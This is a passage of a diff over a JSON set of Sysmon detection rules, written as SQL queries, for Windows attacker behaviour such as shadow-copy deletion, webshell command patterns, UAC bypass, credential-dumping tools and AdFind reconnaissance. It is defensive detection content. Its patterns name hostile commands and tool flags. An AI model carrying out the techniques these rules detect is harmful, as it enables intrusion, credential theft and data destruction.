"proc_creation_win_certutil_certificate_installation.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", + "title": "Password Provided In Command Line Of Net.EXE", + "id": "d4498716-1d52-438f-8084-4a603157d131", "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "description": "Detects a when net.exe is called with a password in the command line", + "author": "Tim Shelton (HAWK.IO)", + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_net_use_password_plaintext.yml" + }, + { + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", - "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "title": "Use Icacls to Hide File to Everyone", + "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", "status": "experimental", - "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", - "author": "TropChaud", + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'RUNDLL32.EXE' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'iCACLS.EXE' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" + "filename": "proc_creation_win_icacls_deny.yml" }, { - "title": "DriverQuery.EXE Execution", - "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Mouse Lock Execution", + "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "status": "test", + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "author": "Cian Heasley", "tags": [ - "attack.discovery" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Legitimate use by third party tools in order to investigate installed drivers" + "Legitimate uses of Mouse Lock software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_usage.yml" + "filename": "proc_creation_win_pua_mouselock_execution.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Findstr Launching .lnk File", + "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "status": "test", + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "author": "Trent Liffick", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1036", + "attack.t1202", + "attack.t1027.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_findstr_lnk.yml" }, { - "title": "Powershell Inline Execution From A File", - "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "status": "experimental", - "description": "Detects inline execution of PowerShell code from a file", - "author": "frack113", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate add to registry via cli (to these locations)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_exec_data_file.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution" - ], + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", - "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Logged-On User Password Change Via Ksetup.EXE", + "id": "c9783e20-4793-4164-ba96-d9ee483992c4", + "status": "experimental", + "description": "Detects password change for the logged-on user's via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /ChangePassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_ksetup_password_change_user.yml" }, { - "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", - "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", - "author": "frack113", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "App-V clients" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "DumpMinitool Usage", - "id": "dee0a7a3-f200-4112-a99b-952196d81e42", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "status": "experimental", - "description": "Detects the use of \"DumpMinitool.exe\" a tool bundled with Visual Studio and DotNTET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", + "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') OR (CommandLine LIKE '% --processId %' ESCAPE '\\' AND CommandLine LIKE '% --dumpType Full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dumpminitool_execution.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Abusing Print Executable", - "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", - "status": "test", - "description": "Attackers can use print.exe for remote file copy", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "status": "experimental", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 